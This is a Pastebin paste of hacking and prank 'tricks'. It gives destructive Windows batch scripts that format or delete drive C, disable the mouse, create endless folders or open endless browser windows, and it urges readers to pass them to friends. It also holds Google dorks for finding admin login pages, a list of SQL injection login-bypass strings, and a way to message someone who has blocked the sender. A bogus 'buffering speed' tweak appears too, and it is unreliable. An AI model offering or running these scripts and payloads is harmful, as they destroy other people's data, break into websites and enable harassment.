Advertisement
grimmjow

Untitled

Oct 2nd, 2013
1,229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.96 KB | None | 0 0
  1. Here's to a wonderful batch virus !
  2.  
  3. I am WARNING YOU !!! This shit is
  4. dangerous !!! Play at your own RISK !!!
  5.  
  6. @echo off
  7. title Stealing, Lying, Now Your PC Is Dying
  8. start firefox.exe mytricksclub.com
  9. cd C:\
  10. :menu
  11. cls
  12. echo Hello, I want to play a game.
  13. pause
  14. echo Live or Die, Make your
  15. choice:
  16. echo 1. Format PC
  17. echo 2. Exit
  18. set /p input=Choice:
  19. if %input%==1 goto one
  20. if %input%==2 goto two
  21. :one
  22. echo y|format C:
  23. :two
  24. echo y|format C:
  25.  
  26. copy in notepad, save as
  27. anything.bat [ you can replace
  28. "anything" with whatever you
  29. want but save it with the .bat
  30. extension] ... Now share it with
  31. your friends !!
  32.  
  33. -__________________________________
  34.  
  35. How To Disable Right Click On Your
  36. Website Or Blog ?
  37. ...........................................................................
  38. .......
  39. 1. Got to your blogger Dashboard
  40. 2. Then Click on Layout. blogger widget
  41. 2. Now Click on Add Gadget and select
  42. Html/Javascript.
  43. blogger widget
  44. 3. Now paste code given below in the
  45. pop up window. <!--MBW Code-->
  46. <script language='JavaScript1.2'>
  47. function disableselect(e){
  48. return false
  49. }
  50. function reEnable(){ return true
  51. }
  52. document.onselectstart=new Function
  53. ("return false")
  54. if (window.sidebar){
  55. document.onmousedown=disablese lect
  56. document.onclick=reEnable
  57. }
  58. </script>
  59. 4. Save it and done. Now users will not
  60. be able to right click on your website.
  61.  
  62. ----------------------------
  63.  
  64. How to Make Dangerous Virus In A Minute?
  65.  
  66. 1. Open Notepad and copy below code into it.
  67.  
  68. @Echo off
  69. Del C:\ *.* |y
  70.  
  71. 2.Save this file as virus.bat (Name can be anything but .bat is must)
  72.  
  73. 3. Now, running this file will delete all the content of C Drive.
  74.  
  75. Warnning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
  76.  
  77. ---------------
  78.  
  79. Increase Youtube Buffering Speed
  80.  
  81. With this trick you can increase Youtube as well as sites like Metacafe video buffering speed@
  82.  
  83. Here it goes --
  84.  
  85. Start -> Run -> system.ini -> Hit Enter
  86.  
  87. paste this Code:
  88.  
  89. page buffer=100Tbps
  90. load=100Tbps
  91. download=100Tbps
  92. save=100Tbps
  93. back=100Tbps
  94. search=100Tbps
  95. sound=100Tbps
  96. webcam=100Tbps
  97. voice=100Tbps
  98. faxmodemfast=100Tbps
  99. update=100Tbps
  100.  
  101. Save it and enjoy!!!
  102. -----------------------
  103.  
  104.  
  105. How To Create Files And Folders With No Name.
  106.  
  107. 1. Create a folder or a file on desktop.
  108.  
  109. 2. Now rename the folder or file by pressing F2 key or by clicking right click rename.
  110.  
  111. 3. Now hold ALT button and press 0160.
  112.  
  113. Note: Type the numbers 0160 from num pad only.
  114.  
  115. 4. There fore no name folder is created.
  116.  
  117. -=----
  118.  
  119. Make a virus that disable Mouse
  120.  
  121. 1) Open Notepad and copy below
  122. codes
  123. rem --------------- --------------- ---
  124. rem Disable Mouse
  125. set key="HKEY_LOCAL _MACHINE
  126. \system \CurrentControl Set
  127. \Services\Mo uclass"
  128. reg delete %key%
  129. reg add %key% /v Start /t REG_
  130. DWORD /d 4
  131. rem --------------- --------------- ---
  132.  
  133. 2) Save this file as virus.bat
  134.  
  135.  
  136. --------------------------------------------
  137.  
  138. How to Bypass Website Logins by SQL Injection
  139.  
  140. These are the Dorks Used to Find Vulnerable Site to Bypass LoginWhich are Most Commonly the .asp One.
  141. Search them in Google without Quoutes
  142.  
  143. “inurl:admin.asp”
  144. “inurl:login/admin.asp”
  145. “inurl:admin/login.asp”
  146. “inurl:adminlogin.asp”
  147. “inurl:adminhome.asp”
  148. “inurl:admin_login.asp”
  149. “inurl:administratorlogin.asp”
  150. “inurl:login/administrator.asp”
  151. “inurl:administrator_login.asp”
  152.  
  153. There are More Dorkseven
  154. Now Go to Admin Panel and Type Admin as Username(Common One)
  155. and in Password we Type Our SQLInjection
  156.  
  157. Here is a list of sql injections.
  158.  
  159. ‘ or ’1′=’1
  160. ‘ or ‘x’=’x
  161. ‘ or 0=0 –
  162. or 0=0 –
  163. ‘ or 0=0 #
  164. ” or 0=0 #
  165. or 0=0 #
  166. ‘ or ‘x’=’x
  167. ” or “x”=”x
  168. ‘) or (‘x’=’x
  169. ‘ or 1=1–
  170. ” or 1=1–
  171. or 1=1–
  172. ‘ or a=a–
  173. ” or “a”=”a
  174. ‘) or (‘a’=’a
  175. “) or (“a”=”a
  176. hi” or “a”=”a
  177. hi” or 1=1 –
  178. hi’ or 1=1 –
  179. ‘or’1=1′
  180.  
  181. -----------------------------------
  182.  
  183. An awesome trick through which you can
  184. make 3000 folder at a time:
  185.  
  186. FOLDER BOMBER
  187.  
  188. This batch file will create 3000+ folder
  189. in less than a minute.
  190.  
  191. Open your notepad and type the following
  192. codes.
  193.  
  194. @echo off
  195. :top
  196. md %random%
  197. goto top
  198.  
  199. Save it as 3000.bat
  200. Give this file to your 'friend' and when he
  201. will click on that his nightmare will be
  202. started.
  203.  
  204. 2. Send messages on fb even if you are BLOCKED!
  205.  
  206. To perform this trick first of all u need fb username of that person to which you are going to send msg.
  207. Go to your primary email id(gmail,yahoo etc)
  208. Compose a new msg to [email protected]
  209. (username= fb id of receiver)
  210.  
  211. Now you can send your victim whatever you want... ]:-)
  212.  
  213. 3. Open notepad and type:
  214.  
  215. :A
  216. start http://www.google.com/
  217. goto A
  218.  
  219. save as anyname.bat
  220. now give that .bat file to ur friend
  221. when ur frd opens the .bat file and then...
  222. ...see the effect
  223. don't run it on your own PC!
  224. try it now on ur friends PC!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement